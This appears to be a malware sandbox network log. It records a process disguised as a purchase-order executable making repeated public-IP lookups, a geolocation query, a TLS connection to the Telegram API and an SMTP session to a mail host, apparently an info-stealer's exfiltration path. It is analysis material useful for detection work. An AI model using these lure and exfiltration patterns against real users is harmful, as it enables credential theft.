                                                            Oct 1, 2024 07:21:07.927762985 CEST4972080192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:08.339921951 CEST44349721188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:08.342152119 CEST49721443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:08.342181921 CEST44349721188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:08.474303961 CEST44349721188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:08.474411964 CEST44349721188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:08.474472046 CEST49721443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:08.475018978 CEST49721443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:08.478718996 CEST4972080192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:08.480086088 CEST4972280192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:08.483891964 CEST8049720132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:08.483961105 CEST4972080192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:08.484934092 CEST8049722132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:08.485001087 CEST4972280192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:08.485105991 CEST4972280192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:08.489836931 CEST8049722132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:09.178500891 CEST8049722132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:09.180345058 CEST49723443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:09.180389881 CEST44349723188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:09.180497885 CEST49723443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:09.180811882 CEST49723443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:09.180825949 CEST44349723188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:09.222913980 CEST4972280192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:09.634068012 CEST44349723188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:09.636006117 CEST49723443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:09.636046886 CEST44349723188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:09.758121967 CEST44349723188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:09.758260012 CEST44349723188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:09.758311033 CEST49723443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:09.759120941 CEST49723443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:09.762959957 CEST4972280192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:09.764132023 CEST4972480192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:09.768035889 CEST8049722132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:09.768112898 CEST4972280192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:09.768903971 CEST8049724132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:09.768975019 CEST4972480192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:09.769123077 CEST4972480192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:09.773827076 CEST8049724132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:10.432738066 CEST8049724132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:10.434245110 CEST49725443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:10.434292078 CEST44349725188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:10.434390068 CEST49725443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:10.434690952 CEST49725443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:10.434701920 CEST44349725188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:10.473195076 CEST4972480192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:10.898169041 CEST44349725188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:10.900135994 CEST49725443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:10.900155067 CEST44349725188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:11.048137903 CEST44349725188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:11.048228025 CEST44349725188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:11.048338890 CEST49725443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:11.049081087 CEST49725443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:11.052581072 CEST4972480192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:11.053714991 CEST4972680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:11.057984114 CEST8049724132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:11.058438063 CEST4972480192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:11.058521032 CEST8049726132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:11.058592081 CEST4972680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:11.058722973 CEST4972680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:11.063481092 CEST8049726132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:11.731317043 CEST8049726132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:11.733052015 CEST49727443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:11.733104944 CEST44349727188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:11.733212948 CEST49727443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:11.733519077 CEST49727443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:11.733532906 CEST44349727188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:11.785408974 CEST4972680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:12.185137033 CEST44349727188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:12.187041998 CEST49727443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:12.187073946 CEST44349727188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:12.333389044 CEST44349727188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:12.333479881 CEST44349727188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:12.333657026 CEST49727443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:12.334330082 CEST49727443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:12.364463091 CEST4972680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:12.369580030 CEST8049726132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:12.369718075 CEST4972680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:12.372538090 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:12.372580051 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:12.372647047 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:12.373106003 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:12.373121977 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:12.981401920 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:12.981523037 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:12.989358902 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:12.989377975 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:12.989655018 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:12.991327047 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:13.031441927 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:13.220815897 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:13.220887899 CEST44349728149.154.167.220192.168.2.9
                                                            Oct 1, 2024 07:21:13.220928907 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:13.225255013 CEST49728443192.168.2.9149.154.167.220
                                                            Oct 1, 2024 07:21:18.440598011 CEST4971380192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:18.611479998 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:18.616460085 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:18.616539955 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:19.340508938 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.340838909 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:19.345721006 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.497006893 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.498248100 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:19.503123999 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.657032013 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.657346010 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:19.662157059 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.818244934 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.818667889 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:19.823407888 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.975565910 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:19.975828886 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:19.980654955 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.155404091 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.155590057 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:20.162400961 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.314780951 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.315548897 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:20.315599918 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:20.315625906 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:20.315638065 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:21:20.320410013 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.320434093 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.320442915 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.320481062 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.704895020 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:21:20.754163980 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:22:58.708041906 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:22:58.712939024 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:22:58.975488901 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:22:58.975514889 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:22:58.975523949 CEST58749731208.91.199.223192.168.2.9
                                                            Oct 1, 2024 07:22:58.976108074 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:22:58.976108074 CEST49731587192.168.2.9208.91.199.223
                                                            Oct 1, 2024 07:22:58.980906963 CEST58749731208.91.199.223192.168.2.9
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 1, 2024 07:20:59.620853901 CEST5846753192.168.2.91.1.1.1
                                                            Oct 1, 2024 07:20:59.627893925 CEST53584671.1.1.1192.168.2.9
                                                            Oct 1, 2024 07:21:00.683144093 CEST5369953192.168.2.91.1.1.1
                                                            Oct 1, 2024 07:21:00.692138910 CEST53536991.1.1.1192.168.2.9
                                                            Oct 1, 2024 07:21:12.364361048 CEST5886553192.168.2.91.1.1.1
                                                            Oct 1, 2024 07:21:12.371706963 CEST53588651.1.1.1192.168.2.9
                                                            Oct 1, 2024 07:21:18.602134943 CEST5277953192.168.2.91.1.1.1
                                                            Oct 1, 2024 07:21:18.610616922 CEST53527791.1.1.1192.168.2.9
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 1, 2024 07:20:59.620853901 CEST192.168.2.91.1.1.10xb49cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:00.683144093 CEST192.168.2.91.1.1.10x2a62Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:12.364361048 CEST192.168.2.91.1.1.10x6d24Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:18.602134943 CEST192.168.2.91.1.1.10xc56aStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 1, 2024 07:20:59.627893925 CEST1.1.1.1192.168.2.90xb49cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 1, 2024 07:20:59.627893925 CEST1.1.1.1192.168.2.90xb49cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:20:59.627893925 CEST1.1.1.1192.168.2.90xb49cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:20:59.627893925 CEST1.1.1.1192.168.2.90xb49cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:20:59.627893925 CEST1.1.1.1192.168.2.90xb49cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:20:59.627893925 CEST1.1.1.1192.168.2.90xb49cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:00.692138910 CEST1.1.1.1192.168.2.90x2a62No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:00.692138910 CEST1.1.1.1192.168.2.90x2a62No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:12.371706963 CEST1.1.1.1192.168.2.90x6d24No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:18.610616922 CEST1.1.1.1192.168.2.90xc56aNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:18.610616922 CEST1.1.1.1192.168.2.90xc56aNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:18.610616922 CEST1.1.1.1192.168.2.90xc56aNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                            Oct 1, 2024 07:21:18.610616922 CEST1.1.1.1192.168.2.90xc56aNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                            • reallyfreegeoip.org
                                                            • api.telegram.org
                                                            • checkip.dyndns.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.949708132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:20:59.695822954 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:00.378700972 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2169360c4b89bd2f873323f81d93742f
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 1, 2024 07:21:00.386464119 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 1, 2024 07:21:00.594599962 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 24aa053b8cef9474141d671c6c0f5905
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 1, 2024 07:21:01.384105921 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 1, 2024 07:21:01.592236996 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 67eb3a8b774308d13a3002f725fdc319
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949713132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:02.224773884 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 1, 2024 07:21:02.921678066 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 7c4be9a81f25cda6ab809ffbedd2af65
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.949716132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:03.545608044 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:05.218928099 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 1, 2024 07:21:05.219253063 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 1, 2024 07:21:05.219564915 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 1, 2024 07:21:05.219705105 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.949718132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:05.814796925 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:06.500246048 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:06 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 0bb3a96f9101507e2a3d88acce7c903e
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.949720132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:07.191354990 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:07.883394003 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:07 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: ad809d11818a9f1f3fc38d50e1f2bc34
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.949722132.226.247.73807704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 1, 2024 07:21:08.485105991 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 1, 2024 07:21:09.178500891 CEST320INHTTP/1.1 200 OK
                                                            Date: Tue, 01 Oct 2024 05:21:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b20b1bc02e9a9d1711eaf0244f835543
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
